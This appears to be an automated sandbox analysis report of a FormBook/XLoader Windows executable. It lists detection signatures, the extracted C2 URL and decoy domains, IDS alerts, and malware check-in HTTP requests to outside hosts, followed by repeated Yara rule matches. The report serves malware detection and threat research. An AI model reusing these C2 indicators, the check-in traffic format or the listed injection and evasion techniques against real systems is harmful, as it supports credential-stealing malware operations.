Windows Analysis Report DN_467842234567.exe

Overview

General Information

Sample Name: DN_467842234567.exe
Analysis ID: 491743
MD5: c16013ea29f9dd1525dcb65c2184784e
SHA1: 5afd533f29573050734e428f9f8c9ba08c79546a
SHA256: df05d916a02c09e1dba0df0841f93697e407a334ce8d2371dfe8befd909d8a43
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.bofight.store/r95e/"], "decoy": ["mindyourbusinesscoin.com", "melandri.club", "13011196.com", "bespinpoker.com", "ohchainpodklo.xyz", "paolacapitanio.com", "hnczppjs.com", "healthygold-carefit.club", "drive16pay.art", "5foldmastermind.com", "especialistasorteios.online", "cjcveterotqze.com", "originaldigitalspaces.com", "21lawsofconfidence.com", "uscryptomininglaws.com", "nilist.xyz", "bergstromgreenholt.icu", "dumbasslures.com", "companieus.com", "2gtfy0.com", "jpbrunos.com", "cdsensor.host", "memorypc.gmbh", "blue-music.com", "lottochain.bet", "exegen.online", "gardenmanager.net", "tyczhhapph5.com", "financecreditpro.com", "you-teikeis.site", "portale-accessi-anomali.com", "performansorganizasyon.xyz", "coinoforum.com", "kagulowa.com", "kxdrstone.com", "projudi-poker.com", "glu-coin.com", "mremvd.icu", "smpldebts.com", "gabgbang.com", "hoochhousebar.com", "zuowxk.icu", "whatipm.com", "healthcaresms.com", "nurhalilah.xyz", "platforma-gaz.space", "railrats.com", "lastmedicalcard.com", "1auwifsr.icu", "ctgybebuy.com", "2377k.com", "mightynz.com", "sbcsdaia.com", "conversionlist.com", "ventas.rest", "scotlaenlinea.site", "byemreperde.com", "getsilverberg.com", "meannamemories.com", "signotimes.com", "jhuipx1cnb.xyz", "5apchk35.xyz", "tspd.site", "aoshihuanyu.com"]}
Multi AV Scanner detection for submitted file
Source: DN_467842234567.exe ReversingLabs: Detection: 64%
Yara detected FormBook
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll ReversingLabs: Detection: 11%
Machine Learning detection for sample
Source: DN_467842234567.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.1.DN_467842234567.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.DN_467842234567.exe.e920000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.WWAHost.exe.3d57968.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.DN_467842234567.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.WWAHost.exe.a398b0.0.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

Uses 32bit PE files
Source: DN_467842234567.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 4x nop then pop esi 1_2_00415815
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 4x nop then pop esi 1_2_00415818
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop esi 7_2_00575815
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop esi 7_2_00575818

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.kxdrstone.com
Source: C:\Windows\explorer.exe Domain query: www.financecreditpro.com
Source: C:\Windows\explorer.exe Domain query: www.2377k.com
Source: C:\Windows\explorer.exe Domain query: www.portale-accessi-anomali.com
Source: C:\Windows\explorer.exe Network Connect: 5.9.90.226 80
Source: C:\Windows\explorer.exe Domain query: www.nurhalilah.xyz
Source: C:\Windows\explorer.exe Domain query: www.uscryptomininglaws.com
Source: C:\Windows\explorer.exe Domain query: www.healthcaresms.com
Source: C:\Windows\explorer.exe Network Connect: 104.21.11.163 80
Source: C:\Windows\explorer.exe Domain query: www.drive16pay.art
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe Domain query: www.lottochain.bet
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.98 80
Source: C:\Windows\explorer.exe Domain query: www.smpldebts.com
Source: C:\Windows\explorer.exe Network Connect: 202.165.66.108 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.nurhalilah.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.bofight.store/r95e/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1Host: www.nurhalilah.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1Host: www.uscryptomininglaws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1Host: www.financecreditpro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1Host: www.lottochain.betConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1Host: www.2377k.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1Host: www.drive16pay.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 19:07:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L1%2Fcb9sF0iYG9tLZL%2BCND7WWwL50k6FpCO6GkNPjTY8HledrDzcbyuzJAJs%2BC3yUD5GaZvDIhbwwTZOsvt8Qf3jJY5JuckW7ioIU2oZopXGVv5Lg9KbGsLMIggxHDd9g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6957037758895c14-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color:
Source: DN_467842234567.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: DN_467842234567.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: unknown DNS traffic detected: queries for: www.kxdrstone.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404FF1

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: DN_467842234567.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
